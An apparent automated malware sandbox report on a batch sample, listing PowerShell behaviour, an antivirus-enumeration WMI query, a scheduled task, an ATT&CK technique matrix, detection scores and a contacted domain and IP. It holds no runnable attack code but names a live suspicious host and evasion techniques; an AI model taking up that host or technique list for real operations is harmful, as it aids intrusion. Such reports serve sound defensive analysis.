Source: conhost.exe, 00000013.00000002.3014122795.0000013F06C30000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3041930219.0000016A82560000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.2470924991.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: conhost.exe, 00000013.00000002.3014122795.0000013F06C30000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3041930219.0000016A82560000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.2470924991.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\System32\cmd.exe

Code function: 18_3_0000022123C02AF0 cpuid

18_3_0000022123C02AF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$rbx-U7ejKPED VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$rbx-U7ejKPED VolumeInformation

Source: C:\Windows\System32\dllhost.exe

Code function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

37_2_0000000140002300

Source: C:\Windows\System32\cmd.exe

Code function: 18_2_0000022123C28090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

18_2_0000022123C28090

Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: dllhost.exe, Amcache.hve.10.dr, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.49.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	12 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Obfuscated Files or Information	11 Input Capture	3 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	22 Command and Scripting Interpreter	11 Scheduled Task/Job	813 Process Injection	1 Software Packing	Security Account Manager	132 System Information Discovery	SMB/Windows Admin Shares	11 Input Capture	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	31 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	1 DLL Side-Loading	NTDS	471 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	31 Registry Run Keys / Startup Folder	1 File Deletion	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Rootkit	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	251 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	813 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	2 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1.cmd	4%	ReversingLabs
1.cmd	3%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
azure-winsecure.com	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://aka.ms/pscore6	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://www.microsoft.co	1%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/09/policy	0%	Virustotal		Browse
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	0%	Virustotal		Browse
http://schemas.xmlsoap.org/wsdl/erties	0%	Virustotal		Browse
https://aka.ms/pscore68	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://github.com/Pester/Pester	1%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	0%	Virustotal		Browse
http://Passport.NET/tb	0%	Virustotal		Browse
http://schemas.xmlsoap.org/wsdl/soap12/	0%	Virustotal		Browse
http://docs.oasis-open.org/ws-sx/ws-trust/200512	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
azure-winsecure.com	192.64.119.55	true	false	8%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000007.00000002.2385169405.000001A6A96E0000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F2783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/wsdl/erties	lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://crl.microsoft	powershell.exe, 00000007.00000002.2143087471.000001A697909000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2475973230.000002A7E1F25000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://go.micro	powershell.exe, 00000023.00000002.2477927278.000002A7E3703000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.co	powershell.exe, 00000019.00000002.3053661070.0000016A83A50000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://contoso.com/License	powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
